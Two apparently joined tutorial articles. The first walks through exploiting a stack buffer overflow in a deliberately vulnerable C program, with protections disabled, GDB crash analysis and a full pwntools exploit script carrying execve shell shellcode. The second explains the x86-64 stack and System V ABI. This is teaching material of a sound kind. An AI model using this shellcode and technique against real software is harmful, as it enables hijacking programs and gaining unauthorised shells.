In this article, I am going to show how to exploit a stack-based buffer overflow and the conditions that make this possible. For the purpose of this exercise, we are going to switch off 3 security features: Address Space Layout Randomization (ASLR) Non-executable stack (aka stack execution prevention, aka NX Bit) Stack canary (aka stack-protector) How to switch off ASLR To switch off ASLR: $ sudo bash -c 'echo 0 > /proc/sys/kernel/randomize_va_space' (Note that I didn’t do sudo echo 0 > /proc/sys/kernel/randomize_va_space because the output redirection command > will be performed as standard user but we need root permission to perform this operation.) How to switch off non-executable stack and stack canary security features To switch off the non-executable stack and the stack canary protections, we need to compile the program as follow: $ gcc -fno-stack-protector -z execstack -o overflow64 overflow64.c The use of the option -z execstack will prevent stack to be non-executable (i.e., it will be executable) while the option -fno-stack-protector disable the stack canary protection. Stack-based buffer overflow scheme The overflow of a variable positioned in the stack occurs when an operation is performed without checking the details of such operation resulting in a writing beyond the boundaries of such variable. When an operation write data on a buffer based on the stack beyond its limits, this operation can cause the overwriting of the return address of the function where this variable is allocated. This is because, as explained in The Stack, the local variables are above the return address as shown in the picture below. How we can exploit this situation? What can we write into the stack? The left stacks in both images represent a normal stack. The right stacks in both images represent a stack after the unsafe write operation. The unsafe operation started to write data from the top of the stack (where the stack variable is stored) and continue beyond its limit to overwrite the return address of the same function. This address is where the program expect to find the return address of the function. By overwriting this address we are able to to diverge the execution of the program. In this image, we can see that in the stack is written also some nop slides before the shellcode. These are only a series of nop operations, i.e., no-operation operation (0x90 in machine code). We use nop slide because sometimes it is difficult to the jump to the start of the shellcode. In this way it is possible to jump approximately before it. The nop operation is 1 byte long, and jumping to any byte address where these operations are located will not cause any error. This instruction is used because it does not do anything and it moves to the next operation. At the end of the nop slide the shellcode will be located and executed. The program to exploit This is the source code of the program that we are going to exploit: // file: overflow64.c #include<stdio.h> int main(int argc, char* argv[]) { char buff[20]; scanf("%s", buff); return 0; } In line 7, there is a vulnerable operation. Why vulnerable? Because it does not check the boundaries of the arrays that are being copied (check man scanf). Let’s compile this program as described in previously. The first thing we need to do is to crash the program. If we input more than 20 characters the program crash: $ ./overflow64 aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa Segmentation fault (core dumped) We can see that the terminal reports Segmentation fault. Let’s try to get a bit more details on this crash. The next step is to understand why it is crashing. By running dmesg: $ dmesg | tail ...... [13401.299114] overflow64[16566]: segfault at 616161616161 ip 0000616161616161 sp 00007fffffffddb0 error 14 in libc-2.27.so[7ffff79e4000+1e7000] The logs shown by dmesg show that the program named “overflow64” received a segfault (segmentation fault) when trying to access a memory location with address 616161616161. (When we run the program, we input a lot of “a” that in ASCII are represented with the hexadecimal value of 0x61. Is it a coincidence? Spoiler alert: no.) This happen because the program is trying to access a memory address that is not supposed to. Giving in input more “a"s we can incur in a different dmesg message: $ dmesg | tail ...... [13747.451995] traps: overflow64[16766] general protection ip:555555554697 sp:7fffffffdda8 error:0 in overflow64[555555554000+1000] In this case the message is referring to a general protection. What is this? In x86_64 bit architecture the maximum canonical address is currently 0x00007fffffffffff. Therefore even if an address is 64 bit long, current processor use only 48 bits of those. This was done because 48 bit address gives already an address space of 256 terabytes, therefore it will be enough for quite a long future. Therefore instead of wasting hardware and power resources, the hardware manufactures decided this way. The architecture design support 64 bit but the current hardware implementations do not. To gather even more information on the crash we can run the program within GDB. For this purpose I use GEF to have an easier access to debug information. $ gdb -q ./overflow64 GEF for linux ready, type `gef` to start, `gef config` to configure 73 commands loaded for GDB 8.1.0.20180409-git using Python engine 3.6 Reading symbols from ./overflow64...(no debugging symbols found)...done. gef➤ r Starting program: /home/pippo/ctf/lectures/basic_buffer_overflow/overflow64 aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa Program received signal SIGSEGV, Segmentation fault. [ Legend: Modified register | Code | Heap | Stack | String ] ───────────────────────────────────────────────────────────────── registers ──── $rax : 0x0 $rbx : 0x0 $rcx : 0x00007ffff7dd0560 → 0x00007ffff7dcc580 → 0x00007ffff7b9996e → 0x636d656d5f5f0043 ("C"?) $rdx : 0x00007ffff7dd18d0 → 0x0000000000000000 $rsp : 0x00007fffffffdcd8 → "aaaaaaaaaaaaaaaaaa" $rbp : 0x6161616161616161 ("aaaaaaaa"?) $rsi : 0x1 $rdi : 0x0 $rip : 0x0000555555554697 → <main+45> ret $r8 : 0x0 $r9 : 0x0 $r10 : 0x0 $r11 : 0x0000555555554726 → add BYTE PTR [rax], al $r12 : 0x0000555555554560 → <_start+0> xor ebp, ebp $r13 : 0x00007fffffffddb0 → 0x0000000000000001 $r14 : 0x0 $r15 : 0x0 $eflags: [zero carry PARITY adjust sign trap INTERRUPT direction overflow RESUME virtualx86 identification] $cs: 0x0033 $ss: 0x002b $ds: 0x0000 $es: 0x0000 $fs: 0x0000 $gs: 0x0000 ───────────────────────────────────────────────────────────────────── stack ──── 0x00007fffffffdcd8│+0x0000: "aaaaaaaaaaaaaaaaaa" ← $rsp 0x00007fffffffdce0│+0x0008: "aaaaaaaaaa" 0x00007fffffffdce8│+0x0010: 0x00007fffff006161 ("aa"?) 0x00007fffffffdcf0│+0x0018: 0x0000000100008000 0x00007fffffffdcf8│+0x0020: 0x000055555555466a → <main+0> push rbp 0x00007fffffffdd00│+0x0028: 0x0000000000000000 0x00007fffffffdd08│+0x0030: 0x7d8cd030cadb6f2f 0x00007fffffffdd10│+0x0038: 0x0000555555554560 → <_start+0> xor ebp, ebp ─────────────────────────────────────────────────────────────── code:x86:64 ──── 0x55555555468c <main+34> call 0x555555554540 <__isoc99_scanf@plt> 0x555555554691 <main+39> mov eax, 0x0 0x555555554696 <main+44> leave → 0x555555554697 <main+45> ret [!] Cannot disassemble from $PC ─────────────────────────────────────────────────────────────────── threads ──── [#0] Id 1, Name: "overflow64", stopped, reason: SIGSEGV ───────────────────────────────────────────────────────────────────── trace ──── [#0] 0x555555554697 → main() ──────────────────────────────────────────────────────────────────────────────── 0x0000555555554697 in main () In line 47, this program stopped because received the SIGSEGV i.e., segmentation fault (see man 7 signal for more information on signals). In lines 41-45, you can see code information. You can see that the program stopped at the ret instruction. In lines 12-30, you can see registers information. In lines 32-39, you can see stack information. In line 7, we can see the input that we fed to the program. The ret takes the address pointed by the stack pointer (rsp) and continue the execution from there. The address that the program is trying to jump to is an invalid address that we overwrite when we overflow the address. Our goal is to be able to write in this address an arbitrary address so that we can divert the execution. We need to write an address that when executed its content will eventually execute our shellcode. With the help of GDB we can break in the main function and have a look at the stack address of the function: $ gdb -q ./overflow64 GEF for linux ready, type `gef` to start, `gef config` to configure 73 commands loaded for GDB 8.1.0.20180409-git using Python engine 3.6 Reading symbols from ./overflow64...(no debugging symbols found)...done. gef➤ b main Breakpoint 1 at 0x66e gef➤ r Starting program: /home/pippo/ctf/lectures/basic_buffer_overflow/overflow64 ...... ──────────────────────────────────────────────────────────────────────────────────────────────────────────────── stack ──── 0x00007fffffffdcc0│+0x0000: 0x00005555555546a0 → <__libc_csu_init+0> push r15 ← $rsp, $rbp 0x00007fffffffdcc8│+0x0008: 0x00007ffff7a05b97 → <__libc_start_main+231> mov edi, eax 0x00007fffffffdcd0│+0x0010: 0x0000000000000001 0x00007fffffffdcd8│+0x0018: 0x00007fffffffdda8 → 0x00007fffffffe12f → "/home/pippo/ctf/lectures/basic_buffer_overflow/ove[...]" 0x00007fffffffdce0│+0x0020: 0x0000000100008000 0x00007fffffffdce8│+0x0028: 0x000055555555466a → <main+0> push rbp 0x00007fffffffdcf0│+0x0030: 0x0000000000000000 0x00007fffffffdcf8│+0x0038: 0x34f880d1fbfab7e5 ────────────────────────────────────────────────────────────────────────────────────────────────────────── code:x86:64 ──── 0x555555554665 <frame_dummy+5> jmp 0x5555555545d0 <register_tm_clones> 0x55555555466a <main+0> push rbp 0x55555555466b <main+1> mov rbp, rsp → 0x55555555466e <main+4> sub rsp, 0x30 0x555555554672 <main+8> mov DWORD PTR [rbp-0x24], edi 0x555555554675 <main+11> mov QWORD PTR [rbp-0x30], rsi 0x555555554679 <main+15> lea rax, [rbp-0x20] 0x55555555467d <main+19> mov rsi, rax 0x555555554680 <main+22> lea rdi, [rip+0x9d] # 0x555555554724 ...... Breakpoint 1, 0x000055555555466e in main () (The snippet shows only the interesting parts.) In line 11, we can see that the stack is currently at position 0x00007fffffffdcc0. The space of the local variable have not been allocated yet as shown in line 23. When we overflow the local variables we are going to write our shellcode around this address. In order to execute the shellcode we need to overwrite the return address of the function with our crafted address. The location of the return address to overwrite is relative to the buffer that we are overflowing depends on many things. It depends on the size of other local variables (and their positions compared to the overflowed one) the stack alignment, and to the presence of the stack canary. The best way to find the correct location is to try to input increasingly number of input until we can see that we overwrite the return address of the function. Once we find the offset of the return address, we need to point it to the shellcode. We have already found the location near where the shellcode will be located. What needs to be placed in the stack is a nop slide to help to reach our shellcode as shown previously. This is achieved with the following code (I am using Pwntools): # filename: exploit_overflow64.py from pwn import * import sys # process name to exploit process_path = "./overflow64" shellcode = "\x48\x31\xff\x57\x57\x5e\x5a\x48\xbf\x2f\x2f" shellcode += "\x62\x69\x6e\x2f\x73\x68\x48\xc1\xef\x08\x57" shellcode += "\x54\x5f\x6a\x3b\x58\x0f\x05" # return address obtained by adding 0x30 to the top of the stack # maximum canonical address size is 0x00007FFFFFFFFFFF ret_addr = "\x00\x00\x7f\xff\xff\xff\xdd\x50"[::-1] payload = "A"*40 + ret_addr payload += "\x90" * 500 + shellcode # Writing payload to file to be used elsewhere (e.g., GDB) f = open("payload", 'w') f.write(payload) f.close() # start the program proc = process(process_path) # send payload proc.sendline(payload) # we need interact with the spawned shell proc.interactive() proc.close() In line 16, we can see that I am preparing the input to the scanf function writing 40 “A”, then the return address, then 500 nop operations and finally the shellcode. Now can can give the input to the function that will overflow the variable and write the correct return address. We can run it on GDB and break it just after the scanf function our stack will look like this: gef➤ dereference $rsp 20 0x00007fffffffdc90│+0x0000: 0x00007fffffffdda8 → 0x9090909090909090 ← $rsp 0x00007fffffffdc98│+0x0008: 0x0000000100000000 0x00007fffffffdca0│+0x0010: 0x4141414141414141 0x00007fffffffdca8│+0x0018: 0x4141414141414141 0x00007fffffffdcb0│+0x0020: 0x4141414141414141 0x00007fffffffdcb8│+0x0028: 0x4141414141414141 0x00007fffffffdcc0│+0x0030: 0x4141414141414141 ← $rbp 0x00007fffffffdcc8│+0x0038: 0x00007fffffffdd50 → 0x9090909090909090 0x00007fffffffdcd0│+0x0040: 0x9090909090909090 0x00007fffffffdcd8│+0x0048: 0x9090909090909090 0x00007fffffffdce0│+0x0050: 0x9090909090909090 The address below the rbp is the one that contains the return address that we overwrite when we overflow the variable and now it points to a location where nop are store. At the end of the nop there is the shellcode, when executed, the program is going to eventually execute the shellcode that was our initial goal
In this article I want to describe how the stack works and how it is structured. Background information The stack is a LIFO (Last In First Out) data structure used to store information about functions of a running program. The information store in the stack follow some specifications, for x86-64 architecture the System V ABI (Application Binary Interface) is a set of specification that define libraries, function, executable, how these elements interact with each other and much more. System V ABI For x86-64 architecture the System V ABI defines (among other things): The stack grows towards low memory locations. The registers RDI, RSI, RDX, RCX, R8, R9 (in this order) are used to pass parameters to a function (this different than in 8086 architecture). If a function requires more parameters they will be pushed into the stack. The stack alignment is 16 bytes Conceptually, on x86-64 architecture the stack looks like this: **Conceptually the stack looks like this:** -- Let’s now run an example program and check what is actually stored in the stack. The example program The program that we are going to execute is: // file: example64.c int function(int a, int b) { int c; c = a * b; return c; } int main(int argc, char* argv[]) { int d; d = function(7,15); return d; } I am going to compile the code as : $ gcc -mpreferred-stack-boundary=4 -fno-stack-protector -o example64 example64.c When decompiled the main function looks like: Dump of assembler code for function main: 0x0000000000000613 <+0>: push rbp 0x0000000000000614 <+1>: mov rbp,rsp 0x0000000000000617 <+4>: sub rsp,0x20 0x000000000000061b <+8>: mov DWORD PTR [rbp-0x14],edi 0x000000000000061e <+11>: mov QWORD PTR [rbp-0x20],rsi 0x0000000000000622 <+15>: mov esi,0xf 0x0000000000000627 <+20>: mov edi,0x7 0x000000000000062c <+25>: call 0x5fa <multiplication> 0x0000000000000631 <+30>: mov DWORD PTR [rbp-0x4],eax 0x0000000000000634 <+33>: mov eax,DWORD PTR [rbp-0x4] 0x0000000000000637 <+36>: leave 0x0000000000000638 <+37>: ret End of assembler dump. In line 5 and 6 we can see that the parameters passed to the main function are store in two memory locations [rbp-0x14] and [rbp-0x20]. In fact, in Background Information you can see that the first two parameters are passed in register rdi and rsi. In line 7 and 8 we can see that the function parameter 15 and 7 are being positioned in the rdi and rsi registers before the call of the multiplication function (they are stored in esi and edi that are the lowest 32 bit parts of the 64 bit registers rdi and rsi ). Set a breakpoint in line 8, .i.e., just before the call to the multiplication function. When the program hit the breakpoint the stack will look like this: gef➤ dereference $rsp 5 0x00007fffffffdd20│+0x0000: 0x00007fffffffde28 → 0x00007fffffffe1af → "/home/pippo/example64" ← $rsp 0x00007fffffffdd28│+0x0008: 0x00000001555544f0 0x00007fffffffdd30│+0x0010: 0x00007fffffffde20 → 0x0000000000000001 0x00007fffffffdd38│+0x0018: 0x0000000000000000 0x00007fffffffdd40│+0x0020: 0x0000555555554640 → <__libc_csu_init+0> push r15 ← $rbp In line 2, it is shown the result of the instruction DWORD PTR [rbp-0x20],rsi (in line 6 of the disassembled main). The memory value is the second parameter of the function main, in fact it was stored in register edi, i.e., the register that contains the second parameter of function call. The memory location rbp-0x20 points to the byte with value 0x28 (i.e., the right most byte of the value 0x00007fffffffde28). Remember that we are in a little-endian architecture so the address with value 0x00007fffffffde28 will store its lowest byte in the highest position in memory. We also need to remember also that the stack grows towards lower memory locations. In line 3, there is the result of the instruction DWORD PTR [rbp-0x14],edi (in line 6 of the disassembled main). In the stack is copied only 4 bytes, i.e., edi (DWORD). In line 5, this is the space used to store the local variable d as shown in line 11 of the C code. As you can see, it is declared as int, i.e., it occupy 4 bytes. If we sum up the 4 bytes used to store the argc + the 8 bytes of the argv[] + the 4 bytes of the d variable the total is only 16 bytes. Why the program is allocating 32 bytes sub rsp,0x20 (in line 4 of the disassembled main)?. Although, argc is passed in the register edi that is 4 bytes, the stack reservation is for the full register i.e., 8 bytes. Furthermore, the program has been compiled with the option -mpreferred-stack-boundary=4 that align the stack to multiple of 2^4 bytes i.e., 16 bytes. Therefore, the only option was to allocate the nearest multiple of 16 bytes i.e., 32 bytes (or 0x20 bytes). GDB tip. In GDB, it’s easy to get confused regarding the position of each byte because they are usually display in groups of 8 bytes. To have a visual graphical representation of the memory location, you can follow this sign: Here, the address on the left, points to the right most byte on the right, that is also the lowest memory address on the line. Following the arrow to reach the top of the stack, that means going toward low memory addresses. Continue the example. Let’s now see what does the multiplication function looks like when disassembled: gef➤ disassemble multiplication Dump of assembler code for function multiplication: 0x00000000000005fa <+0>: push rbp 0x00000000000005fb <+1>: mov rbp,rsp 0x00000000000005fe <+4>: mov DWORD PTR [rbp-0x14],edi 0x0000000000000601 <+7>: mov DWORD PTR [rbp-0x18],esi 0x0000000000000604 <+10>: mov eax,DWORD PTR [rbp-0x14] 0x0000000000000607 <+13>: imul eax,DWORD PTR [rbp-0x18] 0x000000000000060b <+17>: mov DWORD PTR [rbp-0x4],eax 0x000000000000060e <+20>: mov eax,DWORD PTR [rbp-0x4] 0x0000000000000611 <+23>: pop rbp 0x0000000000000612 <+24>: ret End of assembler dump. In this function we can see that there is no space reservation in the stack as in line 4 of the main disassembled function. We can see parameters copied above rsp in line 5 and 6. In this particular case, since these parameters are used just after it, there is no harm in coping them above rsp. Set a breakpoint in line 12. Once we hit the breakpoint, we can see that stack as follow: gef➤ dereference $rsp 0x00007fffffffdd18│+0x0000: 0x0000555555554631 → <main+30> mov DWORD PTR [rbp-0x4], eax ← $rsp 0x00007fffffffdd20│+0x0008: 0x00007fffffffde28 → 0x00007fffffffe1af → "/home/pippo/example64" 0x00007fffffffdd28│+0x0010: 0x00000001555544f0 0x00007fffffffdd30│+0x0018: 0x00007fffffffde20 → 0x0000000000000001 0x00007fffffffdd38│+0x0020: 0x0000000000000000 0x00007fffffffdd40│+0x0028: 0x0000555555554640 → <__libc_csu_init+0> push r15 ← $rbp In line 2, we can see that rsp is pointing toward the memory location of the instruction that needs to be executed when the program finished the execution of the multiplication function. (Here, the rbp point already to the previous memory frame and it is ready to resume the execution of the main.) This is the end of this stack walkthrough. I hope it was helpful, additional resources follows. Additional resources More to read about System V ABI: https://wiki.osdev.org/System_V_ABI